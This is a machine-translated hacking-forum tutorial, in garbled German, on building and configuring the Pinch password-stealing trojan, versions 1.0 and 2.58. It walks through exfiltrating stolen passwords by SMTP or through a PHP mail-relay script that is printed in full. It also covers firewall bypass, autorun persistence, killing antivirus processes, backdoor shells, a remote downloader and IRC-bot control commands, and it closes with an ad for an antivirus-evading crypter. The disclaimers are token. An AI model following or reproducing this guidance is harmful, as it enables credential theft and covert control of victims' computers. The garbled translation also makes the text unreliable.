This page has been robot translated, sorry for typos if any. Original content here.

Wir brechen die Seife, verwenden Sie BrutusAET2


DAS MATERIAL IST FÜR DIE FAMILIARISIERUNG VERÖFFENTLICHT. DER AUTOR IST NICHT EINE VERANTWORTUNG


-------------------------------------------------- ----------------
Teil 1. alt, aber nützlich. Für Prise 1

************************
Anleitung für Pinch 1.0
************************

=====
Intro
=====

Bitte seien Sie nicht überrascht, dass ich beschlossen habe, einen solchen Artikel zu schreiben (Artikel für lamerzzz). Die Tatsache ist, dass auf meinem Forum (http://forum.web-hack.ru) etwa einmal alle drei Tage ein Thema erstellt wird, wie "Wie richtig konfigurieren und Pinch verwenden?", "Wie benutzt man Pinch?" usw.

===========
Eigenschaften
===========

Dieser Trojaner ist 2003/2004 weit verbreitet. Danke an die Fähigkeit, eine große Anzahl von Passwörtern zu stehlen (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ & AIM, & RQ, The Bat!, The Outlook Express Outlook, IE autocomplete & protected sites & ftp (9x / ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (9x / Me / 2k / xp unterstützt)), kleines Gewicht, Open Source und einfache Erstellung einer Troy für eine bestimmte Aufgabe. Troyan hat folgende Möglichkeiten:

- Senden Sie die Konfiguration des Opfercomputers: Betriebssystem, Betriebssystem, CPU, Festplatte, angemeldeter Benutzer, Hostname, IP
- Keyboard-Spion (Key-Log)
- Fernkonsole
- Bypass Firewall
- Senden aller Passwörter per E-Mail über einen SMTP-Server
- Verschlüsselung von gestohlenen Passwörtern per Post
- Trojaner-Selbstentfernung nach dem Start
- HTML / Textberichte
- Dateigröße ist ca. 10Kb
- Modulares System
- Und vieles mehr...

Troyan schrieb coban2k (http://www.cobans.net) - eine hübsche berühmte Person in der Welt des ICQ-Hackens. Aufgrund von Problemen mit dem Hosting über die Speicherung des Trojaners auf ihrem Server, war der Autor gezwungen, diese Schöpfung von seiner Website zu entfernen. Leider finden fast alle Antiviren diese Dreiergruppe und es kann nur dem Opfer vipit sein, der kein Antivirus hat.

============
Lieferumfang
============

Die folgenden Ordner und Dateien sind im Archiv (pinch_1.0.zip) mit dem Trojaner enthalten:

\ PinchBuilder.exe - Zauberer zum Erstellen eines Trojaners
\ Parser.exe - Programm zum Entschlüsseln verschlüsselter E-Mails mit Passwörtern
\ Readme.txt - keine Kommentare
\ Pinch \ - der Hauptordner mit asm-Quellen des Trojaners und des Compilers
\ Quellen \ - andere Quellen
\ TB! 2 Plugin (Auto-Parser) \ - Ordner mit einem Plug-In für The Bat 2!, Das verschlüsselte E-Mails mit Passwörtern, die zu deinem Postfach kommen, entschlüsselt
\ Sources \ Script \ - PHP-Skript, durch das Passwörter bei der Auswahl der entsprechenden Option beim Kompilieren gesendet werden (weiterlesen)

================
Kompilieren Sie das Triple
================

Das Kit enthält einen speziellen Assistenten (PinchBuilder.exe), der für die Erstellung des Trojaners für Ihre Anforderungen und die Kompilierung des Trojaners direkt auf Ihrem Computer verantwortlich ist. Das Programm hat zwei Hauptregister: Kompilieren und entschlüsseln. Der erste wird verwendet, um den Trojaner zu erstellen, und der zweite wird verwendet, um Passwörter zu entschlüsseln (in der Tat ist diese Registerkarte das Ergebnis der Parser.exe-Datei). Dann gibt es drei Unter-Tabs: SMTP, HTTP und FILE. Sie haben die Möglichkeit, Passwörter auszugeben. Lassen Sie uns jeden einzelnen ausführlicher analysieren:

========
SMTP
========

Geben Sie im Feld Server die Adresse (Hostname / IP) des SMTP-Servers ein. Wenn Sie die Server-Domäne eingegeben haben, klicken Sie auf "Auflösen", um die Server-Domain wie eine IP-Adresse auszusehen. Als nächstes geben Sie in den Feldern Aus und An Ihre eigene Seife an. Die Send-Test-Massage-Taste wird für Test-Mail-Sendung verwendet, durch die Einstellungen, die Sie angegeben haben. Ich empfehle Ihnen, dass Sie es verwenden. Wenn der Brief nicht ankommt, bedeutet das, dass es einige Probleme beim Senden gibt (inklusive Firewall, schlechtes SMTP, nicht auf Resolve, etc.).

Ich möchte bemerken, dass vor kurzem die meisten ISPs zu einem System wechseln, wodurch ihre Kunden E-Mails NUR von ihrem SMTP-Verver senden können. In solchen Fällen empfehle ich die Verwendung von Briefen per HTTP.

====
HTTP
====

Wir laden die Datei \ Sources \ Script \ view.php auf den Server, der PHP-Scripts unterstützt und die Mail-Funktion () ausführt. Als nächstes geben Sie im Feld URL den Pfad zu diesem Skript an (z. B. http://www.xss.ru/pinch.php). Geben Sie im Feld Betreff den Namen des Themas an, mit dem die Nachrichten wiederhergestellt werden sollen. Das Feld Status check str sollte eine Zeile enthalten, die nach dem Laden vom Skript ausgegeben wird. In dem Skript, das mit der Troy kommt, hat es einen Wert: _ret_ok_1:

<Script language = "JavaScript">
Window.status = "_ ret_ok_1";
</ Script>

Wenn dieser Wert vom Trojaner nicht akzeptiert wird, wird er versuchen, eine Nachricht über dieses Skript jede Minute zu senden, bis er einen String aus dem Feld Status check str erhält. Ich empfehle, dass du das Skript nicht von der Standardlieferung benutzt, sondern von mir geschrieben hast:

<Html> <Körper>
<? Php
// Autor: Terabyte (http://www.web-hack.ru)
$ Email = $ _ POST ['a'];
$ Betreff = $ _ POST ['b'];
$ Msg = $ _ POST ['c'];
Wenn (isset ($ email) und isset ($ subject) und isset ($ msg)) {
Mail ($ email, $ subject, $ msg, "Von: $ email");}
?>
<Script language = "JavaScript">
Window.status = "_ ret_ok_1";
</ Script>
</ Body> </ html>

Er macht fast dasselbe, ist aber kompetenter geschrieben. Ein großer Vorteil bei der Verwendung dieser Methode zum Senden von Passwörtern ist die Tatsache, dass es Ihnen erlaubt, Passwörter zu übergehen, die die Firewall umgehen. Wie wird das erreicht? Hier ist ein Ausschnitt aus dem Vorposten-Protokoll beim Senden des Passworts durch das Skript von meiner Website:

Prozessname: iexplorer.exe
Protokoll: HTTP
Fernadresse: www.web-hack.ru

Ich glaube, jeder verstand wer nicht im Tank ist =) Auch aus den Plusen kann ich die Fähigkeit, verschlüsselte Buchstaben auf deiner Website zu schreiben, hervorheben und sie nicht an Seife schicken. Die Fähigkeit, die Seife zu ändern, auf die die Passwörter gesendet werden, falls sie gelöscht wird; Wenn Massen-Mailing die Troy (so dass Passwörter können auch von den Anbietern gesendet werden, wo der Zugriff auf alle SMTP-Server außer für sie deaktiviert ist)

====
DATEI
====

Diese Registerkarte gibt den Pfad zu der Datei an, in der alle Passwörter gespeichert werden. Um dies zu tun, schreiben Sie im Feld Pfad den Pfad zur Datei (z. B. C: \ password.txt).

================
Compiler-Optionen
================

In diesem Bereich ist alles klar, dann musst du nur die Boxen ankreuzen, wo du es brauchst. Es ist notwendig, auf das Feld Add Icon zu achten. Es zeigt den Pfad zum Symbol an, aus dem der kompilierte Trojaner angezeigt wird. Ich möchte feststellen, dass ich auf meinem System (Windows XP) den Trojaner nicht mit dieser Option kompiliert habe und es musste deaktiviert werden.

Geben Sie in den Protokollelementen die Methode an, mit der die Passwörter gesendet werden sollen (SMTP / HTTP / FILE). Als nächstes klicken Sie auf die Schaltfläche Kompilieren und gehen Sie, um den Trojaner zu kompilieren, der im Hauptordner mit dem Assistenten gespeichert wird, um ihn zu erstellen.

=====================
Entschlüsselung von Passwörtern
=====================

Angenommen, du hast es geschafft, dieses Dreifache zu veröffentlichen, und du auf der Seife kamen Passwörter aus dem Auto des Opfers. Die Sache ist, dass beim Senden, Passwörter verschlüsselt und muss zuerst entschlüsselt werden (wenn Sie nicht über ein spezielles Plug-in zu TheBat! Beschrieben oben). Kopiere den Text in die Zwischenablage mit verschlüsselten Passwörtern, öffne Parser.exe (oder die Registerkarte Entschlüsselung in PinchBuilder.exe) und klicke im Kontextmenü auf Prozessdaten (oder einfach ganz Alt + C). Als nächstes wird das Programm Ihnen alle Daten aus dem Opfer mit einer bequemen Form gestohlen werden. Dann können Sie sie speichern oder ausdrucken.

==========
Schlussfolgerung
==========

Ich möchte Sie warnen, dass Sie bei der Verwendung dieses Trojaners sofort unter Artikel 273 des Strafgesetzbuches der Russischen Föderation fallen und streng bestraft werden können ;-) Ich (der Autor des Artikels) habe keine Verantwortung für den Schaden, der einigen Personen nach dem Lesen meines Artikels entstehen kann.


----------------------------------------

Teil 2. Anleitung für Prise 2.58

Ein kleiner Artikel über die elementare Konfiguration der Prise. Beurteile nicht streng, sondern kritisiere in deinem ganzen Mund. Artikel über die Einrichtung Pinch 2.58.

Ich denke, dass bei Riss-Ohm-Problemen gibt es keine niukavo, da gibt es eine detaillierte Hilfe und sogar das Video angeschlossen ist. Ich möchte Ihnen zeigen, wie man ein drei in Builder einrichtet:

SMTP-Eigenschaften
Server (geben Sie in Ihrem Fall smtp.mail.ru) ein, dann müssen Sie unbedingt Resolve drücken, damit es in IP umgewandelt wird (übrigens muss der Betrug mit dem Internet verbunden sein)

Port - lassen Sie es so wie es ist

Protokoll - Wählen Sie aus, wie der Bericht generiert wird, per SMTP, HTTP (via PHP) und FILE - auf dem Computer gespeichert. Die gleichen Tasten (SMTP, HTTP, FILE) konfigurieren die Protokolle, aber in diesem Fall interessieren wir uns für SMTP und wir haben es bereits konfiguriert.

TestSend- Taste sendet eine Testnachricht an die Mail.

Die Registerkarte PWD - passiert Passwörter aus den aufgeführten Programmen. Die ENABLE PWD-Klausel enthält keine Passwörter, wenn das Daw entfernt wird.
Senden Sie keinen alten Bericht - senden Sie keine alten Berichte.
Enten verschlüsseln und verpacken sind miteinander verbunden. FSG, UPX, MEW Auswahl der Verpackungsmethode.

RUN- Tab - wählen Sie die Methoden der Autorun. Ich glaube, du wirst es aussortieren. Bevölkern als .... standart, DLL, Unentschiedener Service. Bewegen Sie den Ordner ..... oder Sie spezifizieren oder wählen Sie eines der System diejenigen. Auf der rechten Seite, die Spalte Werte, die ich nicht berührte und um ehrlich zu sein, vage ich mir vorstellen, warum. Von rechts unten - Umgehung der Windows-Firewall (SP2) - Umgehung der System-Firewall in SP2 (soweit ich den Mechanismus dieses Artikels kenne - startet es als iexplorer.exe)

Die Registerkarte SPY - einige zusätzliche Berichte - es hat nicht für mich gearbeitet. Point Screen Spion - Screenshots, aber wieder hat es nicht für mich gearbeitet (srkin wurde gesendet, aber es war leer)

NET Tab - ich habe es nicht benutzt. Es ist entworfen, um:
1. Öffnen Sie jeden Port auf dem infizierten Computer, und dementsprechend erhalten Sie Zugang zu ihm (stark, ich benutze es nicht, wenn Sie es nicht verschlüsseln, wenn Sie gefangen werden, Sie erraten, was es sein wird ...)
2. Downloader - spezifizieren Sie einen direkten Link zu einer Datei, die heruntergeladen und gestartet werden soll (schätzen Sie, welche Kosten Ihr Feind entstehen wird, wenn er Verkehr hat ......))))
3. AutoUpdate - Auto-Update - drei, nachdem die Arbeit beendet ist, lädt es seine Kopie herunter, und dann ist es selbstzerstört und die nächste Systembelastung, eine neue Kopie wird gestartet (dies ist für Zuverlässigkeit, so dass es nicht gefunden werden kann.

Die BD (Backdoor) Registerkarte - die Konsole öffnet die Shell auf dem ausgewählten Port, telnet control (telnet.exe) oder alternative Programme. (Ich selbst habe es nicht ausprobiert)

Die ECT- Registerkarte - Kleben zusammen mit jeder Datei, sowie das Setzen des Symbols ... Sie können auch das tun, die Meldung erscheint ... Aber etwas geht nicht ...

Der KILL- Tab - Töten eines Prozesses (Sie können versuchen, das Antivirus zu töten), zum Beispiel "spidernt" - und dann wird der DrWEB-Monitor ausgeschaltet (ich warne Sie, ich habe es noch nicht gegeben, aber ich werde es versuchen)

IE tab - setze deine Homepage zum Browser. Hinzufügen einer Seite zu Favoriten ....

Die WORM tab - sho ze tae, ich nicht ... .....

IRC-bot tab - Zugang zum Computer über IRC:
.login Berechtigung
.die - den bot herunterfahren
.download - Sprungdatei von URL
.httpd - Öffnen Sie den Dateizugriff über http auf einem bestimmten Port
.Killthread - Abschluss einer bestimmten Aufgabe
.proxy - Öffnen eines cos4 mit dem ausgewählten Port mit der ausgewählten ID
.raw - Senden von rohem Text an diesen irc Server
.remove - löschen
.restart - neu starten
.run - Ausführen von Befehlen
.scan - Scannen von IP-Adressen auf bestimmte offene Ports
.Shell - Öffnung der Shell auf einem bestimmten Port (nicht in 95/98 / ME)
.status - show version, IP, Startdatum
.threads - zeigen aktive Aufgaben
.update - self-updating bot von einer speziellen URL
.visit - Besuch ausgewählter URL versteckt
.url - die ausgewählte URL offen besuchen
.link - zu favoriten hinzufügen
.sp - mach deine Homepage
.msg - messagebox

Das scheint alles zu sein .... Du drückst COMPILE und du hast einen Ordner im Ordner mit dem Builder ...

GUTES GLÜCK !!!!!

PS Dies, wie, alles ist für die Überprüfung geschrieben und der Autor trägt keine Verantwortung für die Konsequenzen ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Crypt Features:
Ein polymorpher Kryptor verwendet
Bypassing KIS und Outpost (einschließlich der neuesten Versionen)
Selbstentfernung
Verringerung der Größe (Normalklemme sinkt um 3-6kb, Zupacha Loader um 60-80kb)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~